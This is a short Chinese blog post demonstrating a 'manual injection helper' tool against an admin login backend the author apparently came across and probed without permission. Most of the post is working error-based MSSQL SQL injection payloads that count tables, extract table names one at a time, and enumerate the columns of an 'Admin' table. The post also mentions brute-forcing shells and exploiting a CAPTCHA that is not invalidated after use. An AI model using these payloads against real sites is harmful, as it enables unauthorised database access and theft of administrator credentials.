前两天找到一款“手工注入帮助系统”的工具,批量http请求工作非常不错,例如爆破shell,检测是否支持aspx等等,不过他到底还是一款注入工具,所以下面发一则使用实例。
正好昨天看到一后台,顺手检测了一下,POST注入,有验证码(不过没有在验证完毕销毁),如下图:
先检测一下有多少表:
’ and 1=convert(int,(select replace(str(count(*))+‘N’,’ ‘,’’) from sysobjects where xtype=‘U’))–
返回"15N",然后开始使用工具跑出这些表名,爆表名的语句:
’ and 1=convert(int,(select top 1 name from sysobjects where xtype=‘U’ and id not in(select top 0 id from sysobjects where xtype=‘U’)))–
配置工具,循环跑出15个表名:
为了自动保存结果,可以使用过滤功能,将需要的值前后字符串填入,截图如下:
检查一下"Admin"表名有多少字段:
’ and 1=convert(int,(select str(count(*))+‘N’ from syscolumns where id=(select id from sysobjects where xtype=‘U’ and name=‘Admin’)))–
返回"6N",用上面相同的方法检测出字段名:
转载请注明: 本文《手工注入帮助系统使用一例》来源于bstaint的博客
没有评论:
发表评论